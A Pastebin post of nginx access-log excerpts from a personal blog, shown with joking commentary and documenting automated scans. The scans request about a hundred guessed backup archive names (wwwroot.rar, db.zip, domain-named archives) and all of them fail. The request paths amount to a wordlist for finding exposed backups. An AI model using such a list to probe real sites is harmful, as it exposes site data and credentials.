Advertisement
voodooKobra

Access of Evil 0x01

Jun 19th, 2014
278
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 52.21 KB | None | 0 0
  1. $ date
  2. Thu Jun 19 09:52:18 EDT 2014
  3. $ cat /var/log/nginx/access.log | ./cleanup
  4. __ ______ _ _
  5. /\ / _| | ____| (_) |
  6. / \ ___ ___ ___ ___ ___ ___ | |_ | |____ ___| |
  7. / /\ \ / __/ __/ _ \/ __/ __| / _ \| _| | __\ \ / / | |
  8. / ____ \ (_| (_| __/\__ \__ \ | (_) | | | |___\ V /| | |
  9. /_/ \_\___\___\___||___/___/ \___/|_| |______\_/ |_|_|
  10. Episode 0x01 - Space Communists
  11. {{{
  12. Sometimes, I see some funny/strange shit in my access logs. Some of these
  13. are super lame attempts to hack my blog, others I'm not quite sure what the
  14. fuck is even going on. This will be an iregular publication of some of the
  15. fail I've witnessed, mostly for the lulz of it.
  16.  
  17. NOTE: All IP addresses are censored to prevent law enforcement from ever
  18. inadvertently benefiting from this publication. Hacking should not be a
  19. crime, unless it's used to steal, commit fraud, or violate privacy. See
  20. also: What FBI and NSA hackers do.
  21. }}}
  22.  
  23. AoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoE
  24. AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE
  25. AoE "No, all my backups are not belong to public webroot" AoE
  26. AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE AoE
  27. AoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoEAoE
  28. ################################################################################
  29. @ https://scott.arciszewski.me @
  30. ================================================================================
  31.  
  32. 0.0.0.1 - - [16/Jun/2014:11:40:47 +0400] "HEAD /cx.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  33. 0.0.0.1 - - [16/Jun/2014:11:40:48 +0400] "HEAD /cx.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  34. 0.0.0.1 - - [16/Jun/2014:11:40:49 +0400] "HEAD /rj.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  35. 0.0.0.1 - - [16/Jun/2014:11:40:49 +0400] "HEAD /rj.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  36. 0.0.0.1 - - [16/Jun/2014:11:40:50 +0400] "HEAD /db.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  37. 0.0.0.1 - - [16/Jun/2014:11:40:50 +0400] "HEAD /db.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  38. 0.0.0.1 - - [16/Jun/2014:11:40:51 +0400] "HEAD /wz.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  39. 0.0.0.1 - - [16/Jun/2014:11:40:52 +0400] "HEAD /wz.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  40. 0.0.0.1 - - [16/Jun/2014:11:40:52 +0400] "HEAD /fdsa.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  41. 0.0.0.1 - - [16/Jun/2014:11:40:53 +0400] "HEAD /fdsa.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  42. 0.0.0.1 - - [16/Jun/2014:11:40:55 +0400] "HEAD /wangzhan.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  43. 0.0.0.1 - - [16/Jun/2014:11:40:56 +0400] "HEAD /wangzhan.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  44. 0.0.0.1 - - [16/Jun/2014:11:40:56 +0400] "HEAD /root.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  45. 0.0.0.1 - - [16/Jun/2014:11:40:57 +0400] "HEAD /root.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  46. 0.0.0.1 - - [16/Jun/2014:11:40:57 +0400] "HEAD /admin.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  47. 0.0.0.1 - - [16/Jun/2014:11:40:58 +0400] "HEAD /admin.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  48. 0.0.0.1 - - [16/Jun/2014:11:40:59 +0400] "HEAD /data.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  49. 0.0.0.1 - - [16/Jun/2014:11:40:59 +0400] "HEAD /gg.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  50. 0.0.0.1 - - [16/Jun/2014:11:41:00 +0400] "HEAD /vip.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  51. 0.0.0.1 - - [16/Jun/2014:11:41:00 +0400] "HEAD /vip.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  52. 0.0.0.1 - - [16/Jun/2014:11:41:04 +0400] "HEAD /flashfxp.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  53. 0.0.0.1 - - [16/Jun/2014:11:41:04 +0400] "HEAD /flashfxp.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  54. 0.0.0.1 - - [16/Jun/2014:11:41:05 +0400] "HEAD /\xC2\xBD\xC4\xBC.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  55. 0.0.0.1 - - [16/Jun/2014:11:41:06 +0400] "HEAD /\xC2\xBD\xC4\xBC.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  56. 0.0.0.1 - - [16/Jun/2014:11:41:26 +0400] "HEAD /1.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  57. 0.0.0.1 - - [16/Jun/2014:11:41:27 +0400] "HEAD /2.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  58. 0.0.0.1 - - [16/Jun/2014:11:41:27 +0400] "HEAD /2.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  59. 0.0.0.1 - - [16/Jun/2014:11:41:28 +0400] "HEAD /3.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  60. 0.0.0.1 - - [16/Jun/2014:11:41:28 +0400] "HEAD /3.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  61. 0.0.0.1 - - [16/Jun/2014:11:41:29 +0400] "HEAD /wwwroot.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  62. 0.0.0.1 - - [16/Jun/2014:11:41:30 +0400] "HEAD /wwwroot.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  63. 0.0.0.1 - - [16/Jun/2014:11:41:30 +0400] "HEAD /HYTop.mdb HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  64. 0.0.0.1 - - [16/Jun/2014:11:41:31 +0400] "HEAD /www.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  65. 0.0.0.1 - - [16/Jun/2014:11:41:31 +0400] "HEAD /www.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  66. 0.0.0.1 - - [16/Jun/2014:11:41:32 +0400] "HEAD /bbs.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  67. 0.0.0.1 - - [16/Jun/2014:11:41:33 +0400] "HEAD /bbs.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  68. 0.0.0.1 - - [16/Jun/2014:11:41:34 +0400] "HEAD /web.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  69. 0.0.0.1 - - [16/Jun/2014:11:41:34 +0400] "HEAD /web.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  70. 0.0.0.1 - - [16/Jun/2014:11:41:35 +0400] "HEAD /s.arciszewski.me.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  71. 0.0.0.1 - - [16/Jun/2014:11:41:35 +0400] "HEAD /s.arciszewski.me.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  72. 0.0.0.1 - - [16/Jun/2014:11:41:36 +0400] "HEAD /sarciszewskime.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  73. 0.0.0.1 - - [16/Jun/2014:11:41:37 +0400] "HEAD /sarciszewskime.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  74. 0.0.0.1 - - [16/Jun/2014:11:41:37 +0400] "HEAD /arciszewski.me.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  75. 0.0.0.1 - - [16/Jun/2014:11:41:38 +0400] "HEAD /arciszewski.me.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  76. 0.0.0.1 - - [16/Jun/2014:11:41:38 +0400] "HEAD /arciszewski.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  77. 0.0.0.1 - - [16/Jun/2014:11:41:39 +0400] "HEAD /arciszewski.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  78. 0.0.0.1 - - [16/Jun/2014:11:41:40 +0400] "HEAD /2010.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  79. 0.0.0.1 - - [16/Jun/2014:11:41:40 +0400] "HEAD /2010.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  80. 0.0.0.1 - - [16/Jun/2014:11:41:41 +0400] "HEAD /2011.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  81. 0.0.0.1 - - [16/Jun/2014:11:41:41 +0400] "HEAD /2011.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  82. 0.0.0.1 - - [16/Jun/2014:11:41:42 +0400] "HEAD /2012.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  83. 0.0.0.1 - - [16/Jun/2014:11:41:43 +0400] "HEAD /2012.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  84. 0.0.0.1 - - [16/Jun/2014:11:41:43 +0400] "HEAD /2013.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  85. 0.0.0.1 - - [16/Jun/2014:11:41:44 +0400] "HEAD /2013.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  86. 0.0.0.1 - - [16/Jun/2014:11:41:44 +0400] "HEAD /2014.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  87. 0.0.0.1 - - [16/Jun/2014:11:41:45 +0400] "HEAD /2014.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  88. 0.0.0.1 - - [16/Jun/2014:11:41:46 +0400] "HEAD /bf.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  89. 0.0.0.1 - - [16/Jun/2014:11:41:46 +0400] "HEAD /bf.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  90. 0.0.0.1 - - [16/Jun/2014:11:41:47 +0400] "HEAD /\xD5\xBE.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  91. 0.0.0.1 - - [16/Jun/2014:11:41:47 +0400] "HEAD /\xD5\xBE.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  92. 0.0.0.1 - - [16/Jun/2014:11:41:48 +0400] "HEAD /.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  93. 0.0.0.1 - - [16/Jun/2014:11:41:49 +0400] "HEAD /.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  94. 0.0.0.1 - - [16/Jun/2014:11:41:49 +0400] "HEAD /.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  95. 0.0.0.1 - - [16/Jun/2014:11:41:50 +0400] "HEAD /.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  96. 0.0.0.1 - - [16/Jun/2014:11:41:50 +0400] "HEAD /.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  97. 0.0.0.1 - - [16/Jun/2014:11:41:51 +0400] "HEAD /.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  98. 0.0.0.1 - - [16/Jun/2014:11:41:52 +0400] "HEAD /11.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  99. 0.0.0.1 - - [16/Jun/2014:11:41:52 +0400] "HEAD /11.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  100. 0.0.0.1 - - [16/Jun/2014:11:41:53 +0400] "HEAD /22.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  101. 0.0.0.1 - - [16/Jun/2014:11:41:53 +0400] "HEAD /22.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  102. 0.0.0.1 - - [16/Jun/2014:11:41:54 +0400] "HEAD /33.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  103. 0.0.0.1 - - [16/Jun/2014:11:41:55 +0400] "HEAD /33.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  104. 0.0.0.1 - - [16/Jun/2014:11:41:55 +0400] "HEAD /44.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  105. 0.0.0.1 - - [16/Jun/2014:11:41:56 +0400] "HEAD /44.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  106. 0.0.0.1 - - [16/Jun/2014:11:41:56 +0400] "HEAD /55.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  107. 0.0.0.1 - - [16/Jun/2014:11:41:57 +0400] "HEAD /55.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  108. 0.0.0.1 - - [16/Jun/2014:11:41:58 +0400] "HEAD /66.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  109. 0.0.0.1 - - [16/Jun/2014:11:41:58 +0400] "HEAD /66.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  110. 0.0.0.1 - - [16/Jun/2014:11:41:59 +0400] "HEAD /77.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  111. 0.0.0.1 - - [16/Jun/2014:11:41:59 +0400] "HEAD /77.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  112. 0.0.0.1 - - [16/Jun/2014:11:42:00 +0400] "HEAD /88.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  113. 0.0.0.1 - - [16/Jun/2014:11:42:01 +0400] "HEAD /88.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  114. 0.0.0.1 - - [16/Jun/2014:11:42:01 +0400] "HEAD /99.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  115. 0.0.0.1 - - [16/Jun/2014:11:42:02 +0400] "HEAD /99.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  116. 0.0.0.1 - - [16/Jun/2014:11:42:03 +0400] "HEAD /4.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  117. 0.0.0.1 - - [16/Jun/2014:11:42:03 +0400] "HEAD /4.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  118. 0.0.0.1 - - [16/Jun/2014:11:42:04 +0400] "HEAD /5.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  119. 0.0.0.1 - - [16/Jun/2014:11:42:04 +0400] "HEAD /5.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  120. 0.0.0.1 - - [16/Jun/2014:11:42:05 +0400] "HEAD /6.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  121. 0.0.0.1 - - [16/Jun/2014:11:42:06 +0400] "HEAD /6.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  122. 0.0.0.1 - - [16/Jun/2014:11:42:06 +0400] "HEAD /7.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  123. 0.0.0.1 - - [16/Jun/2014:11:42:07 +0400] "HEAD /7.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  124. 0.0.0.1 - - [16/Jun/2014:11:42:07 +0400] "HEAD /8.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  125. 0.0.0.1 - - [16/Jun/2014:11:42:08 +0400] "HEAD /8.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  126. 0.0.0.1 - - [16/Jun/2014:11:42:09 +0400] "HEAD /9.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  127. 0.0.0.1 - - [16/Jun/2014:11:42:09 +0400] "HEAD /9.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  128. 0.0.0.1 - - [16/Jun/2014:11:42:10 +0400] "HEAD /0.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  129. 0.0.0.1 - - [16/Jun/2014:11:42:10 +0400] "HEAD /0.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  130. 0.0.0.1 - - [16/Jun/2014:11:42:11 +0400] "HEAD /00.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  131. 0.0.0.1 - - [16/Jun/2014:11:42:12 +0400] "HEAD /00.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  132. 0.0.0.1 - - [16/Jun/2014:11:42:12 +0400] "HEAD /000.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  133. 0.0.0.1 - - [16/Jun/2014:11:42:13 +0400] "HEAD /000.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  134. 0.0.0.1 - - [16/Jun/2014:11:42:13 +0400] "HEAD /ftp.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  135. 0.0.0.1 - - [16/Jun/2014:11:42:14 +0400] "HEAD /ftp.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  136. 0.0.0.1 - - [16/Jun/2014:11:42:15 +0400] "HEAD /fxp.rar HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  137. 0.0.0.1 - - [16/Jun/2014:11:42:15 +0400] "HEAD /fxp.zip HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
  138.  
  139. # {{{ Then some time passes... }}}
  140.  
  141. 0.0.0.2 - - [16/Jun/2014:19:02:45 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  142. 0.0.0.2 - - [16/Jun/2014:19:02:45 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  143. 0.0.0.2 - - [16/Jun/2014:19:02:45 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  144. 0.0.0.2 - - [16/Jun/2014:19:02:45 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  145. 0.0.0.2 - - [16/Jun/2014:19:02:46 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  146. 0.0.0.2 - - [16/Jun/2014:19:02:46 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  147. 0.0.0.2 - - [16/Jun/2014:19:02:49 +0400] "GET /arciszewski.me.zip HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  148. 0.0.0.2 - - [16/Jun/2014:19:02:49 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  149. 0.0.0.2 - - [16/Jun/2014:19:02:50 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  150. 0.0.0.2 - - [16/Jun/2014:19:02:50 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  151. 0.0.0.2 - - [16/Jun/2014:19:02:52 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  152. 0.0.0.2 - - [16/Jun/2014:19:02:52 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  153. 0.0.0.2 - - [16/Jun/2014:19:02:55 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  154. 0.0.0.2 - - [16/Jun/2014:19:02:55 +0400] "GET /scott.arciszewski.me.rar HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
  155. 0.0.0.2 - - [16/Jun/2014:19:02:55 +0400] "GET /scott.7z HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)"
